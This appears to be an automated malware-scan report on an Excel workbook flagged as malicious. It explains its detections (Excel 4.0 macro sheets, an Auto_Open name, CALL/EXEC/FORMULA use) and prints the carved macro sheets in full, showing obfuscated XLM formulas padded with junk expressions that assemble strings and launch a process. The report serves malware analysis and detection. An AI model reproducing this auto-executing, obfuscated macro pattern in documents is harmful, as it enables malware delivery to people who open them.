MALICIOUS
Risk Score: 182

Heuristics (4)

- Excel 4.0 macro sheet (3 sheet(s)) | critical | 2 related findings | OOXML_XLM_MACROSHEET
  Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
- Excel 4.0 Auto_Open defined name | critical | OOXML_XLM_AUTOOPEN_DEFINEDNAME
  Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
- Dangerous XLM formula APIs: FORMULA, CALL, HALT, EXEC | critical | OOXML_XLM_DANGEROUS_FN
  Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
- Embedded URL | info | EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/spreadsheetml/2006/main | In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/excel/2006/main | In document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships | In document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 | In document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac | In document text (OOXML body / shared strings)

Extracted artifacts (3)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 5778 bytes |

SHA-256: 7cc29e0426c044da329e809d130552193749e3486fd84097688f127f76120087
Preview script (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AU11:AU26"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="4.5703125" style="1"/></cols><sheetData><row r="11" spans="47:47" x14ac:dyDescent="0.25"><c r="AU11" s="3"/></row><row r="12" spans="47:47" x14ac:dyDescent="0.25"><c r="AU12" s="3"/></row><row r="13" spans="47:47" x14ac:dyDescent="0.25"><c r="AU13" s="3" t="b"><f>FORMULA('Doc4'!AT3&'Doc4'!AT4&'Doc4'!AT5&'Doc4'!AT6&'Doc4'!AT7&'Doc4'!AT8,'Doc1'!A110)</f><v>0</v></c></row><row r="14" spans="47:47" x14ac:dyDescent="0.25"><c r="AU14" s="3" t="b"><f>FORMULA('Doc4'!AU3&'Doc4'!AU4&'Doc4'!AU5&'Doc4'!AU6&'Doc4'!AU7&'Doc4'!AU8&'Doc4'!AU9&'Doc4'!AU10&'Doc4'!AU11&'Doc4'!AU12&'Doc4'!AU13&'Doc4'!AU14&'Doc4'!AU15&'Doc4'!AU16&'Doc4'!AU17&'Doc4'!AU18&'Doc4'!AU19&'Doc4'!AU20,'Doc1'!A111)</f><v>1</v></c></row><row r="15" spans="47:47" x14ac:dyDescent="0.25"><c r="AU15" s="3" t="b"><f>FORMULA('Doc4'!AV3&'Doc4'!AV4&'Doc4'!AV5,'Doc1'!A112)</f><v>1</v></c></row><row r="16" spans="47:47" x14ac:dyDescent="0.25"><c r="AU16" s="3" t="b"><f>FORMULA('Doc1'!A100&'Doc1'!A101&'Doc1'!A102&'Doc1'!A103,'Doc1'!A113)</f><v>1</v></c></row><row r="17" spans="47:47" x14ac:dyDescent="0.25"><c r="AU17" s="3" t="b"><f>FORMULA('Doc4'!AW3&'Doc4'!AW4&'Doc4'!AW5&'Doc4'!AW6&'Doc4'!AW7&'Doc4'!AW8&'Doc4'!AW9,'Doc1'!A115)</f><v>1</v></c></row><row r="18" spans="47:47" x14ac:dyDescent="0.25"><c r="AU18" s="3" t="b"><f>FORMULA('Doc4'!AX3&'Doc4'!AX4&'Doc4'!AX5&'Doc4'!AX6,'Doc1'!A116)</f><v>1</v></c></row><row 
r="19" spans="47:47" x14ac:dyDescent="0.25"><c r="AU19" s="3"/></row><row r="20" spans="47:47" x14ac:dyDescent="0.25"><c r="AU20" s="3"/></row><row r="21" spans="47:47" x14ac:dyDescent="0.25"><c r="AU21" s="3"/></row><row r="22" spans="47:47" x14ac:dyDescent="0.25"><c r="AU22" s="3" t="b"><f>RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!A110,'Doc1'!A111,'Doc1'!A112,'Doc4'!AW13,'Doc1'!A113,'Doc1'!A106,'Doc4'!AW15,'Doc4'!AW16)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)</f><v>0</v></c></row><row r="23" spans="47:47" x14ac:dyDescent="0.25"><c r="AU23" s="3"/></row><row r="24" spans="47:47" x14ac:dyDescent="0.25"><c r="AU24" 
s="3" t="b"><f>RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)='Doc1'!AJ5()=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)</f><v>0</v></c></row><row r="25" spans="47:47" x14ac:dyDescent="0.25"><c r="AU25" s="3"/></row><row r="26" spans="47:47" x14ac:dyDescent="0.25"><c r="AU26" s="3"/></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/><headerFooter alignWithMargins="0"/></xm:macrosheet>

| xlm_sheet_01.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml | 963 bytes |

SHA-256: 5e0b317bc9eef478a9b391aa848d4ca25c6a2921bbc6af4ad6fc140f76188572
Preview script (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A100"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="4.5703125" style="1"/></cols><sheetData><row r="100" spans="1:1" x14ac:dyDescent="0.25"><c r="A100" s="3" t="b"><f>HALT()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><headerFooter alignWithMargins="0"/></xm:macrosheet> |

| xlm_sheet_02.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml | 3090 bytes |

SHA-256: 98345195494abbd762f0f368955be9eed2dfec729c77fce42164df297eed179f
Preview script (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A5:AJ107"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="4.5703125" style="1"/></cols><sheetData><row r="5" spans="36:36" x14ac:dyDescent="0.25"><c r="AJ5" s="3" t="b"><f>SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=""&""&""&""&""&""&""&""=EXEC('Doc1'!$A$115&"2 
"&'Doc1'!$A$106&'Doc1'!$A$116)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)='Doc2'!A100()=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)</f><v>0</v></c></row><row r="99" spans="1:1" x14ac:dyDescent="0.25"><c r="A99" s="4"/></row><row r="100" spans="1:1" x14ac:dyDescent="0.25"><c r="A100" s="4" t="s"><v>0</v></c></row><row r="101" spans="1:1" x14ac:dyDescent="0.25"><c r="A101" s="4" t="s"><v>1</v></c></row><row r="102" spans="1:1" x14ac:dyDescent="0.25"><c r="A102" s="4" t="s"><v>2</v></c></row><row r="103" spans="1:1" x14ac:dyDescent="0.25"><c r="A103" s="4" t="s"><v>3</v></c></row><row r="104" spans="1:1" x14ac:dyDescent="0.25"><c r="A104" s="4"/></row><row r="105" spans="1:1" x14ac:dyDescent="0.25"><c r="A105" s="4"/></row><row r="106" spans="1:1" x14ac:dyDescent="0.25"><c r="A106" s="4" t="s"><v>4</v></c></row><row r="107" spans="1:1" x14ac:dyDescent="0.25"><c r="A107" s="4"/></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><headerFooter alignWithMargins="0"/></xm:macrosheet>